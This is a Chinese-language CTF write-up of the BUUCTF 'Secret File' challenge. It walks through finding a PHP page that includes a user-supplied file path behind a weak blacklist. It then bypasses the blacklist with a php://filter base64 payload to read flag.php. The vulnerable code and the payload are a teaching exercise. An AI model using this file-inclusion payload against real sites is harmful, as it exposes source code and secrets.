[BUUCTF] 极客大挑战 Secret File writeup

打开题目,没发现什么提示,应该是要找什么东西
F12查看源码,发现一个网址
[BUUCTF] 极客大挑战 Secret File writeup_第1张图片根据提示我们进入了如下页面:
[BUUCTF] 极客大挑战 Secret File writeup_第2张图片
点击下方按钮发现跳转到了一个页面
[BUUCTF] 极客大挑战 Secret File writeup_第3张图片猜测应该是要抓包,上burpsuite
抓包后放入repeater Go一下得到又一个网址
[BUUCTF] 极客大挑战 Secret File writeup_第4张图片得到一串代码

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

开始审计代码,发现并不复杂,如果file中匹配到了 "…/“或者 “tp"或者"input” 或者 “data” 的时候会输出 OH NO ,这些ban掉的符号和单词并没有包括"php” ,所以我们可以用那个文件包含漏洞

?file=php://filter/read=convert.base64-encode/resource=flag.php

这样我们可以得到用base64加密的文本
[BUUCTF] 极客大挑战 Secret File writeup_第5张图片tips:把这串字符串提取的时候可以用F12查看器中提取,不然字符串很长一直往右拖很不方便容易漏字符。

最终我们将这个字符串送去解密,获取flag
[BUUCTF] 极客大挑战 Secret File writeup_第6张图片ps:若有不足之处,欢迎大家斧正交流,感谢观看!

你可能感兴趣的:(CTF,WP)